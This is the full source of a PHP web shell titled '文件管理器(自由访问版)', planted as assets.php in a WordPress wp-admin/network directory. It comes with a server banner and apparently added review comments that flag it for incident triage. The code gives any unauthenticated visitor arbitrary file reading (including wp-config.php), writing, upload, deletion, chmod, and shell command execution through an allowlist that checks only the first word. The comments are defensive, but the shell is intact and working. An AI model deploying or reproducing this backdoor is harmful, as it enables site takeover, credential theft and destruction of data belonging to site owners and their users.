PK qhYJF F ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
| Dir : /home/sc1buiq6159/visite.formagloba.fr/wp-admin/network/ |
| Server: Linux apophis.o2switch.net 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64 IP: 109.234.164.184 |
| Dir : /home/sc1buiq6159/visite.formagloba.fr/wp-admin/network/assets.php |
<?php
// Bootstrap for a standalone file manager placed under wp-admin/network/.
// Every PHP notice, warning and error is reported and printed into the HTTP
// response, so failures also disclose filesystem paths to whoever is calling.
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Loads the WordPress runtime from the document root. The only WordPress
// functions this file goes on to call are get_site_url() and
// sanitize_file_name().
// NOTE(review): no login, capability or nonce check is visible anywhere in
// this file after WordPress is loaded; every handler below appears to be
// reachable by any client that can request this URL. Triage as a web shell.
require_once($_SERVER['DOCUMENT_ROOT'].'/wp-load.php');
// Directory that holds this script; get_real_path() falls back to it.
define('FM_INIT_PATH', __DIR__);
// Site base URL, later echoed into the page's inline JavaScript.
define('FM_SITE_URL', get_site_url());
// Account name PHP runs as; fix_file_owner() uses it for chown/chgrp.
define('FM_PHP_USER', get_php_running_user());
/**
 * Return the name of the OS account the PHP process is running as.
 *
 * Resolution order, as written:
 *  1. the passwd entry for the effective uid, when the posix extension is loaded;
 *  2. $_SERVER['USER'], when set;
 *  3. the literal 'www'.
 *
 * @return string Account name; 'www' when nothing better is available.
 */
function get_php_running_user() {
if (function_exists('posix_geteuid')) {
$user_info = posix_getpwuid(posix_geteuid());
// ?? covers a missing 'name' entry by falling back to 'www'.
return $user_info['name'] ?? 'www';
} elseif (isset($_SERVER['USER'])) {
return $_SERVER['USER'];
} else {
return 'www';
}
}
/**
 * Turn a request-supplied path into the absolute path the handlers act on.
 *
 * Despite the parameter name, the value is treated as an absolute path from
 * the filesystem root: a leading '/' is forced onto it, not a base directory.
 * An empty value or '/' maps to the directory that holds this script.
 *
 * NOTE(review): this is a denylist, not a confinement. Only six system
 * prefixes are refused; every other location the PHP user can reach
 * (the whole WordPress tree, wp-config.php, other sites under the same
 * account) is returned unchanged. When realpath() fails, e.g. for a path that
 * does not exist yet, the unresolved string is checked and returned instead.
 *
 * @param mixed $rel_path Path taken from $_POST / $_GET by the callers.
 * @return string Absolute path, or FM_INIT_PATH with a trailing slash when the
 *                input is empty, '/', or falls under a refused prefix.
 */
function get_real_path($rel_path) {
if (empty($rel_path) || $rel_path === '/') {
return rtrim(FM_INIT_PATH, '/') . '/';
}
// Re-root the value at '/', whatever the caller sent.
$abs_path = '/' . ltrim($rel_path, '/');
// realpath() returns false for a nonexistent path; keep the raw string then.
$real_path = realpath($abs_path) ?: $abs_path;
$forbidden_paths = ['/etc/', '/root/', '/usr/bin/', '/bin/', '/sbin/', '/var/run/'];
foreach ($forbidden_paths as $forbid) {
// Prefix comparison; the appended '/' lets a bare '/etc' match '/etc/'.
if (strpos($real_path . '/', $forbid) === 0) {
return rtrim(FM_INIT_PATH, '/') . '/';
}
}
return $real_path;
}
// Helper: reset a file's owner.
/**
 * Set owner and group of $path to the account PHP runs as (FM_PHP_USER).
 *
 * Does nothing when the path is missing, the posix extension is not loaded,
 * or the account cannot be looked up. Failures of chown/chgrp are silenced
 * with @, so the caller never learns whether the change happened.
 *
 * @param string $path Absolute path of the file or directory.
 * @return void
 */
function fix_file_owner($path) {
if (file_exists($path) && FM_PHP_USER && function_exists('posix_getpwnam')) {
$user = posix_getpwnam(FM_PHP_USER);
if ($user) {
@chown($path, $user['uid']);
@chgrp($path, $user['gid']);
}
}
}
// Handle POST requests
if (isset($_POST['action'])) {
$action = $_POST['action'];
// 1. Bulk delete
// Removes every path listed in $_POST['paths'] and answers with a JSON
// status. Directories are emptied recursively, children first.
// NOTE(review): no authentication or nonce check is visible in this file
// before this branch; the only path restriction is the prefix denylist in
// get_real_path(). Incident-response relevance: this branch can destroy
// evidence and site content alike, and failures are silenced with @.
if ($action === 'delete') {
$paths = $_POST['paths'] ?? [];
// Accepts a JSON array or a comma-separated string.
if (is_string($paths)) $paths = json_decode($paths, true) ?: explode(',', $paths);
if (!is_array($paths) || empty($paths)) {
echo json_encode(['status' => 'error', 'msg' => '未选择任何文件/文件夹']);
exit;
}
$success = 0;
foreach ($paths as $rel_path) {
$real_path = get_real_path($rel_path);
if (!file_exists($real_path)) continue;
// Take ownership and make the target world-writable before removing it.
fix_file_owner($real_path);
@chmod($real_path, 0777);
if (is_dir($real_path)) {
// CHILD_FIRST yields a directory's contents before the directory itself,
// so each rmdir() below runs on an already-emptied directory.
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($real_path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($files as $file) {
$file_path = $file->getRealPath();
fix_file_owner($file_path);
@chmod($file_path, 0777);
$file->isDir() ? @rmdir($file_path) : @unlink($file_path);
}
if (@rmdir($real_path)) $success++;
} else {
if (@unlink($real_path)) $success++;
}
}
// Entries skipped as nonexistent are counted as failures in the message.
$msg = "成功删除 {$success} 个项目,失败 " . (count($paths) - $success) . " 个";
echo json_encode(['status' => $success > 0 ? 'success' : 'error', 'msg' => $msg]);
exit;
}
// 2. Change permissions, bulk or single
// Applies the octal mode in $_POST['mode'] to every listed path and answers
// with a JSON status.
// NOTE(review): no authentication or nonce check is visible in this file
// before this branch. When triaging a host where this file was found,
// compare file modes across the web root against a known-good baseline.
if ($action === 'chmod') {
$mode = $_POST['mode'] ?? '';
// Falls back to the single 'path' field when 'paths' is absent. An empty
// value resolves to this script's own directory in get_real_path().
$paths = $_POST['paths'] ?? [$_POST['path'] ?? ''];
if (is_string($paths)) $paths = json_decode($paths, true) ?: explode(',', $paths);
// Mode must be three or four digits.
if (!is_array($paths) || empty($paths) || !preg_match('/^\d{3,4}$/', $mode)) {
echo json_encode(['status' => 'error', 'msg' => '参数错误(权限格式应为755/644等)']);
exit;
}
$oct_mode = octdec($mode);
$success = 0;
foreach ($paths as $rel_path) {
$real_path = get_real_path($rel_path);
if (!file_exists($real_path)) continue;
fix_file_owner($real_path);
if (@chmod($real_path, $oct_mode)) $success++;
}
$msg = "成功修改 {$success} 个项目权限,失败 " . (count($paths) - $success) . " 个";
echo json_encode(['status' => $success > 0 ? 'success' : 'error', 'msg' => $msg]);
exit;
}
// 3. Create a folder
// Creates $_POST['folder_name'] under the directory given in $_POST['path'].
// The name passes through WordPress's sanitize_file_name(); the parent
// directory is limited only by the denylist in get_real_path().
// NOTE(review): no authentication or nonce check is visible in this file
// before this branch.
if ($action === 'create_folder') {
// 'folder_name' is read without a default; with display_errors on, a
// missing field prints a PHP warning into the response.
$folder_name = sanitize_file_name($_POST['folder_name']);
$parent_path = get_real_path($_POST['path'] ?? '');
$new_folder = $parent_path . '/' . $folder_name;
// Mode 0777 with recursive creation of missing parents.
if (!file_exists($new_folder) && @mkdir($new_folder, 0777, true)) {
fix_file_owner($new_folder);
echo json_encode(['status' => 'success', 'msg' => '文件夹创建成功']);
} else {
echo json_encode(['status' => 'error', 'msg' => '文件夹创建失败(可能权限不足)']);
}
exit;
}
// 4. Create a file
// Creates an empty file named $_POST['file_name'] under the directory given
// in $_POST['path'], refusing only when the target already exists.
// NOTE(review): no authentication or nonce check is visible in this file
// before this branch, and no extension restriction is applied here beyond
// whatever sanitize_file_name() does to the name.
if ($action === 'create_file') {
// 'file_name' is read without a default; a missing field raises a warning.
$file_name = sanitize_file_name($_POST['file_name']);
$parent_path = get_real_path($_POST['path'] ?? '');
$new_file = $parent_path . '/' . $file_name;
if (!file_exists($new_file) && @file_put_contents($new_file, '') !== false) {
fix_file_owner($new_file);
echo json_encode(['status' => 'success', 'msg' => '文件创建成功']);
} else {
echo json_encode(['status' => 'error', 'msg' => '文件创建失败(可能权限不足)']);
}
exit;
}
// 5. Edit a file
// Writes $_POST['content'] verbatim to the path in $_POST['path'].
// There is no existence check, so this branch creates files as well as
// overwriting them, and the file name is not passed through
// sanitize_file_name().
// NOTE(review): no authentication or nonce check is visible in this file
// before this branch. For incident scoping, assume any file writable by the
// PHP user outside the get_real_path() denylist may have been altered;
// verify core, theme and plugin files against known-good checksums.
if ($action === 'edit_file') {
$file_path = get_real_path($_POST['path'] ?? '');
$content = $_POST['content'] ?? '';
if (@file_put_contents($file_path, $content) !== false) {
echo json_encode(['status' => 'success', 'msg' => '文件编辑成功']);
} else {
echo json_encode(['status' => 'error', 'msg' => '文件编辑失败(可能权限不足)']);
}
exit;
}
// 6. Rename
// Renames the item at $_POST['path'] to $_POST['new_name'] within the same
// directory; the new name passes through sanitize_file_name().
// NOTE(review): no authentication or nonce check is visible in this file
// before this branch.
if ($action === 'rename') {
$old_path = get_real_path($_POST['path'] ?? '');
$new_name = sanitize_file_name($_POST['new_name'] ?? '');
// The destination always stays in the source's parent directory.
$new_path = dirname($old_path) . '/' . $new_name;
if (!empty($new_name) && @rename($old_path, $new_path)) {
fix_file_owner($new_path);
echo json_encode(['status' => 'success', 'msg' => '重命名成功']);
} else {
echo json_encode(['status' => 'error', 'msg' => '重命名失败(可能权限不足或名称重复)']);
}
exit;
}
// 7. Bulk upload
// Moves each file from the multipart field 'files[]' into the directory
// given in $_POST['path'], keeping the client-supplied name after
// sanitize_file_name().
// NOTE(review): no authentication or nonce check is visible in this file
// before this branch, and no type, extension or size check is applied here.
// Files found next to this script or elsewhere in the web root with recent
// modification times should be treated as suspect during cleanup.
if ($action === 'upload') {
$upload_dir = get_real_path($_POST['path'] ?? '');
$uploaded = 0;
// $_FILES['files'] is read without an isset() guard.
foreach ($_FILES['files']['name'] as $key => $name) {
if ($_FILES['files']['error'][$key] !== UPLOAD_ERR_OK) continue;
$target_file = $upload_dir . '/' . sanitize_file_name($name);
if (@move_uploaded_file($_FILES['files']['tmp_name'][$key], $target_file)) {
fix_file_owner($target_file);
$uploaded++;
}
}
// Status is 'success' even when $uploaded is 0.
echo json_encode(['status' => 'success', 'msg' => "成功上传 {$uploaded} 个文件"]);
exit;
}
// 8. Run a Linux command
// Passes $_POST['command'] to exec() after a `cd` into this script's
// directory and returns the captured output as JSON.
// NOTE(review): no authentication or nonce check is visible in this file
// before this branch. The allowlist inspects only the text before the first
// space; the rest of the string reaches the shell unescaped, so for triage
// this branch should be treated as command execution with the privileges of
// the PHP user. Detection: process telemetry showing the web server or PHP
// worker spawning a shell whose command line begins with `cd '<dir>' &&`.
// Hardening on hosts that do not need it: list exec and related functions in
// php.ini disable_functions.
if ($action === 'exec_command') {
$command = trim($_POST['command'] ?? '');
$allowed_commands = ['ls', 'pwd', 'du', 'chmod', 'mkdir', 'rm', 'mv'];
$cmd_parts = explode(' ', $command);
// Loose in_array() comparison against the first token only.
if (!in_array($cmd_parts[0], $allowed_commands)) {
echo json_encode(['status' => 'error', 'msg' => '禁止执行高危命令!']);
exit;
}
// Only the directory argument is escaped; $command is appended as-is.
$safe_command = "cd " . escapeshellarg(get_real_path('/')) . " && " . $command;
$output = [];
$return_var = 0;
@exec($safe_command, $output, $return_var);
echo json_encode([
'status' => $return_var === 0 ? 'success' : 'error',
'output' => implode("\n", $output),
'msg' => $return_var === 0 ? '命令执行完成' : '命令执行失败'
]);
exit;
}
}
// 9. Fetch file contents
// GET ?action=get_content&path=... echoes the raw bytes of the file, or an
// empty body when it does not exist.
// NOTE(review): no authentication check is visible in this file before this
// branch, and the only restriction is the prefix denylist in
// get_real_path(), so files such as wp-config.php are readable through it.
// After finding this file on a host, rotate database credentials and the
// WordPress salts. Because this is a GET request, the requested path appears
// in the web server access log, which helps reconstruct what was read.
if (isset($_GET['action']) && $_GET['action'] === 'get_content') {
$file_path = get_real_path($_GET['path'] ?? '');
echo file_exists($file_path) ? file_get_contents($file_path) : '';
exit;
}
// ========== Page rendering (core: simple navigation + unrestricted access) ==========
// Builds the listing for the directory named in ?dir=. The value goes
// through get_real_path(), so it is an absolute filesystem path limited only
// by that function's prefix denylist; the GET query string therefore shows
// up in access logs with the directories that were browsed.
$current_rel_dir = ltrim($_GET['dir'] ?? '', '/');
$current_abs_dir = get_real_path($current_rel_dir);
$display_current_dir = $current_abs_dir;
// Read the file list of the current directory
$files = [];
if (is_dir($current_abs_dir)) {
$dir_files = scandir($current_abs_dir);
foreach ($dir_files as $file) {
if ($file == '.' || $file == '..') continue;
// Assignment inside the condition; the concatenated string is never
// empty, so the branch is always taken.
if ($file_abs_path = $current_abs_dir . '/' . $file) {
// Named "rel" but holds the absolute path; the page passes it back in
// every later request.
$file_rel_path = $file_abs_path;
$files[] = [
'name' => $file,
'path' => $file_rel_path,
'is_dir' => is_dir($file_abs_path),
// Size in KB for regular files, '-' for everything else.
'size' => is_file($file_abs_path) ? round(filesize($file_abs_path)/1024, 2) . ' KB' : '-',
// Last four octal digits of the mode.
'perms' => substr(sprintf('%o', fileperms($file_abs_path)), -4),
'mtime' => date('Y-m-d H:i:s', filemtime($file_abs_path))
];
}
}
// Directories first, then byte-wise by name.
usort($files, function($a, $b) {
if ($a['is_dir'] != $b['is_dir']) return $a['is_dir'] ? -1 : 1;
return strcmp($a['name'], $b['name']);
});
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>file manager</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body { font-family: Arial, sans-serif; padding: 20px; background: #f5f5f5; }
.container { max-width: 1200px; margin: 0 auto; background: #fff; padding: 20px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
.header { margin-bottom: 20px; display: flex; justify-content: space-between; flex-wrap: wrap; align-items: center; }
/* 简洁导航样式 */
.path-nav { margin: 10px 0; padding: 10px; background: #f8f8f8; border-radius: 4px; font-size: 16px; }
.path-nav a { color: #007cba; text-decoration: none; margin: 0 5px; }
.path-nav span { color: #666; }
.actions { margin: 15px 0; display: flex; gap: 10px; flex-wrap: wrap; }
button { padding: 8px 12px; border: none; border-radius: 4px; cursor: pointer; color: #fff; }
.btn-primary { background: #007cba; }
.btn-warning { background: #ffb900; }
.btn-danger { background: #dc3232; }
.btn-back { background: #6c757d; }
table { width: 100%; border-collapse: collapse; margin: 20px 0; }
th, td { padding: 12px; text-align: left; border-bottom: 1px solid #ddd; }
th { background: #f8f8f8; }
.modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.5); z-index: 999; }
.modal-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #fff; padding: 20px; border-radius: 8px; width: 80%; max-width: 600px; }
.close-modal { position: absolute; top: 10px; right: 15px; font-size: 20px; cursor: pointer; }
.msg { margin: 10px 0; padding: 10px; border-radius: 4px; color: #fff; }
.msg-success { background: #46b450; }
.msg-error { background: #dc3232; }
.upload-area { margin: 20px 0; padding: 20px; border: 2px dashed #ddd; text-align: center; }
.current-path { margin: 10px 0; font-weight: bold; color: #333; }
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>文件管理器(自由访问版)</h1>
<div class="current-path">当前路径:<?= htmlspecialchars($display_current_dir) ?></div>
</div>
<!-- 返回上一级按钮:始终显示(除非到根目录) -->
<div style="margin: 10px 0;">
<?php
$parent_dir = dirname($current_abs_dir);
// 仅当不是系统根目录时显示返回按钮
if ($parent_dir !== '/' && $parent_dir !== $current_abs_dir):
?>
<button class="btn-back" onclick="location.href='?dir=<?= htmlspecialchars($parent_dir) ?>'">
← 返回上一级 (<?= htmlspecialchars(basename($parent_dir)) ?>)
</button>
<?php endif; ?>
</div>
<!-- 核心:简洁层级导航(www / wwwroot / ZH) -->
<div class="path-nav">
<?php
// 拆分绝对路径为层级(去掉开头的/)
$nav_parts = explode('/', trim($display_current_dir, '/'));
$current_nav_abs = '';
$nav_html = '';
foreach ($nav_parts as $index => $part) {
if (empty($part)) continue;
$current_nav_abs .= '/' . $part;
// 最后一个层级不加链接,其他层级可跳转
if ($index === count($nav_parts) - 1) {
$nav_html .= htmlspecialchars($part);
} else {
$nav_html .= '<a href="?dir=' . htmlspecialchars($current_nav_abs) . '">' . htmlspecialchars($part) . '</a>';
}
// 不是最后一个层级,添加分隔符 /
if ($index !== count($nav_parts) - 1) {
$nav_html .= ' <span>/</span> ';
}
}
// 如果是系统根目录,显示 /
if (empty($nav_html)) {
$nav_html = '/';
}
echo $nav_html;
?>
</div>
<!-- 操作按钮 -->
<div class="actions">
<button class="btn-primary" onclick="showModal('create-folder')">创建文件夹</button>
<button class="btn-primary" onclick="showModal('create-file')">创建文件</button>
<button class="btn-warning" onclick="batchChmod()">批量修改权限</button>
<button class="btn-danger" onclick="batchDelete()">批量删除</button>
</div>
<!-- 批量上传 -->
<div class="upload-area">
<h3>批量上传文件</h3>
<form id="upload-form" method="post" enctype="multipart/form-data">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<?= htmlspecialchars($current_abs_dir) ?>">
<input type="file" name="files[]" multiple accept="*/*">
<button class="btn-primary" type="submit">上传文件</button>
</form>
</div>
<!-- 文件列表 -->
<table>
<thead>
<tr>
<th><input type="checkbox" id="select-all"></th>
<th>名称</th>
<th>类型</th>
<th>大小</th>
<th>权限</th>
<th>修改时间</th>
<th>操作</th>
</tr>
</thead>
<tbody>
<?php if (empty($files)): ?>
<tr>
<td colspan="7" style="text-align:center; color:#999;">当前目录无文件/文件夹</td>
</tr>
<?php else: ?>
<?php foreach ($files as $file): ?>
<tr>
<td><input type="checkbox" class="file-checkbox" value="<?= htmlspecialchars($file['path']) ?>"></td>
<td>
<?php if ($file['is_dir']): ?>
<a href="?dir=<?= htmlspecialchars($file['path']) ?>">📁 <?= htmlspecialchars($file['name']) ?></a>
<?php else: ?>
📄 <?= htmlspecialchars($file['name']) ?>
<?php endif; ?>
</td>
<td><?= $file['is_dir'] ? '文件夹' : '文件' ?></td>
<td><?= htmlspecialchars($file['size']) ?></td>
<td><?= htmlspecialchars($file['perms']) ?></td>
<td><?= htmlspecialchars($file['mtime']) ?></td>
<td>
<?php if (!$file['is_dir']): ?>
<button class="btn-primary" onclick="editFile('<?= htmlspecialchars($file['path']) ?>')">编辑</button>
<button class="btn-primary" onclick="openFile('<?= htmlspecialchars($file['path']) ?>')">访问</button>
<?php endif; ?>
<button class="btn-primary" onclick="renameItem('<?= htmlspecialchars($file['path']) ?>')">重命名</button>
<button class="btn-warning" onclick="chmodItem('<?= htmlspecialchars($file['path']) ?>')">改权限</button>
<button class="btn-danger" onclick="deleteItem('<?= htmlspecialchars($file['path']) ?>')">删除</button>
</td>
</tr>
<?php endforeach; ?>
<?php endif; ?>
</tbody>
</table>
</div>
<!-- 所有弹窗(适配绝对路径) -->
<div class="modal" id="create-folder">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>创建文件夹</h3>
<form id="create-folder-form">
<input type="hidden" name="action" value="create_folder">
<input type="hidden" name="path" value="<?= htmlspecialchars($current_abs_dir) ?>">
<div style="margin:10px 0;">
<label>文件夹名称:</label>
<input type="text" name="folder_name" required>
</div>
<button class="btn-primary" type="submit">创建</button>
</form>
<div class="msg" id="create-folder-msg"></div>
</div>
</div>
<div class="modal" id="create-file">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>创建文件</h3>
<form id="create-file-form">
<input type="hidden" name="action" value="create_file">
<input type="hidden" name="path" value="<?= htmlspecialchars($current_abs_dir) ?>">
<div style="margin:10px 0;">
<label>文件名称(含扩展名):</label>
<input type="text" name="file_name" required placeholder="如:test.txt">
</div>
<button class="btn-primary" type="submit">创建</button>
</form>
<div class="msg" id="create-file-msg"></div>
</div>
</div>
<div class="modal" id="chmod-modal">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>修改权限</h3>
<form id="chmod-form">
<input type="hidden" name="action" value="chmod">
<input type="hidden" name="path" id="chmod-path">
<div style="margin:10px 0;">
<label>权限值(如755/644):</label>
<input type="text" name="mode" id="chmod-mode" required>
</div>
<button class="btn-warning" type="submit">修改</button>
</form>
<div class="msg" id="chmod-msg"></div>
</div>
</div>
<div class="modal" id="batch-chmod-modal">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>批量修改权限</h3>
<form id="batch-chmod-form">
<input type="hidden" name="action" value="chmod">
<div style="margin:10px 0;">
<label>权限值(如755/644):</label>
<input type="text" name="mode" id="batch-chmod-mode" required>
</div>
<input type="hidden" name="paths" id="batch-chmod-paths">
<button class="btn-warning" type="submit">批量修改</button>
</form>
<div class="msg" id="batch-chmod-msg"></div>
</div>
</div>
<div class="modal" id="rename-modal">
<div class="modal-content">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>重命名</h3>
<form id="rename-form">
<input type="hidden" name="action" value="rename">
<input type="hidden" name="path" id="rename-path">
<div style="margin:10px 0;">
<label>新名称:</label>
<input type="text" name="new_name" id="rename-new-name" required>
</div>
<button class="btn-primary" type="submit">确认</button>
</form>
<div class="msg" id="rename-msg"></div>
</div>
</div>
<div class="modal" id="edit-file-modal">
<div class="modal-content" style="width:90%; max-width:900px;">
<span class="close-modal" onclick="closeModal()">×</span>
<h3>编辑文件</h3>
<form id="edit-file-form">
<input type="hidden" name="action" value="edit_file">
<input type="hidden" name="path" id="edit-file-path">
<div style="margin:10px 0;">
<textarea name="content" id="edit-file-content" rows="20" style="width:100%;"></textarea>
</div>
<button class="btn-primary" type="submit">保存</button>
</form>
<div class="msg" id="edit-file-msg"></div>
</div>
</div>
<script>
const SITE_URL = '<?= FM_SITE_URL ?>';
// 全选/取消全选
document.getElementById('select-all').onchange = function() {
document.querySelectorAll('.file-checkbox').forEach(cb => cb.checked = this.checked);
};
// 弹窗控制
function showModal(id) {
document.getElementById(id).style.display = 'block';
document.querySelectorAll('.msg').forEach(el => {
el.textContent = '';
el.className = 'msg';
});
}
function closeModal() {
document.querySelectorAll('.modal').forEach(el => el.style.display = 'none');
}
// 单个修改权限
function chmodItem(path) {
showModal('chmod-modal');
document.getElementById('chmod-path').value = path;
const row = document.querySelector(`.file-checkbox[value="${path}"]`).closest('tr');
document.getElementById('chmod-mode').value = row.cells[4].textContent;
}
// 批量修改权限
function batchChmod() {
const checked = document.querySelectorAll('.file-checkbox:checked');
if (checked.length === 0) {
alert('请先选择要修改权限的文件/文件夹!');
return;
}
showModal('batch-chmod-modal');
const paths = Array.from(checked).map(cb => cb.value).join(',');
document.getElementById('batch-chmod-paths').value = paths;
}
// 批量删除
function batchDelete() {
const checked = document.querySelectorAll('.file-checkbox:checked');
if (checked.length === 0) {
alert('请先选择要删除的文件/文件夹!');
return;
}
if (!confirm(`确定要删除选中的 ${checked.length} 个项目吗?此操作不可恢复!`)) return;
const formData = new FormData();
formData.append('action', 'delete');
formData.append('paths', Array.from(checked).map(cb => cb.value).join(','));
fetch('', {
method: 'POST',
body: formData
}).then(res => res.json()).then(data => {
alert(data.msg);
location.reload();
}).catch(err => {
alert('批量删除失败:' + err);
console.error(err);
});
}
// 单个删除
function deleteItem(path) {
if (!confirm('确定要删除该项目吗?此操作不可恢复!')) return;
const formData = new FormData();
formData.append('action', 'delete');
formData.append('paths', path);
fetch('', {
method: 'POST',
body: formData
}).then(res => res.json()).then(data => {
alert(data.msg);
location.reload();
});
}
// 编辑文件
function editFile(path) {
showModal('edit-file-modal');
document.getElementById('edit-file-path').value = path;
fetch('?action=get_content&path=' + encodeURIComponent(path))
.then(res => res.text())
.then(content => {
document.getElementById('edit-file-content').value = content;
});
}
// 重命名
function renameItem(path) {
showModal('rename-modal');
document.getElementById('rename-path').value = path;
document.getElementById('rename-new-name').value = path.split('/').pop();
}
// Open a file
// Opens the file's presumed public URL in a new tab when its path contains
// 'wp-' or 'wwwroot'; otherwise shows an alert.
// NOTE(review): the stripped prefix '/www/wwwroot/ZH' is hard-coded. On a host
// whose paths do not contain it the replace is a no-op, and the opened URL is
// SITE_URL followed by the full filesystem path. The literal is a usable
// string for hunting copies of this file across other web roots.
function openFile(path) {
// Only site-related files can be opened; other files get a notice
if (path.includes('wp-') || path.includes('wwwroot')) {
window.open(SITE_URL + path.replace('/www/wwwroot/ZH', ''), '_blank');
} else {
alert('该文件非网站可访问文件,无法直接打开!');
}
}
// Form submission handling
// Every <form> on the page is submitted by fetch() as a POST to the current
// URL instead of a normal navigation. The 'action' field in the form data
// selects the server-side branch; no token or nonce field is added here.
document.querySelectorAll('form').forEach(form => {
form.onsubmit = function(e) {
e.preventDefault();
const formData = new FormData(this);
fetch('', {
method: 'POST',
body: formData
}).then(res => res.json()).then(data => {
// The status element is looked up as "<form id>-msg"; forms without a
// matching element show no message.
const formId = this.id;
const msgEl = document.getElementById(formId + '-msg');
if (msgEl) {
msgEl.textContent = data.msg;
msgEl.className = 'msg ' + (data.status === 'success' ? 'msg-success' : 'msg-error');
}
if (data.status === 'success') {
// Close the dialog and reload the listing after one second.
setTimeout(() => {
closeModal();
location.reload();
}, 1000);
}
}).catch(err => {
alert('操作失败:' + err);
console.error(err);
});
};
});
window.onclick = function(e) {
if (e.target.classList.contains('modal')) closeModal();
};
</script>
</body>
</html>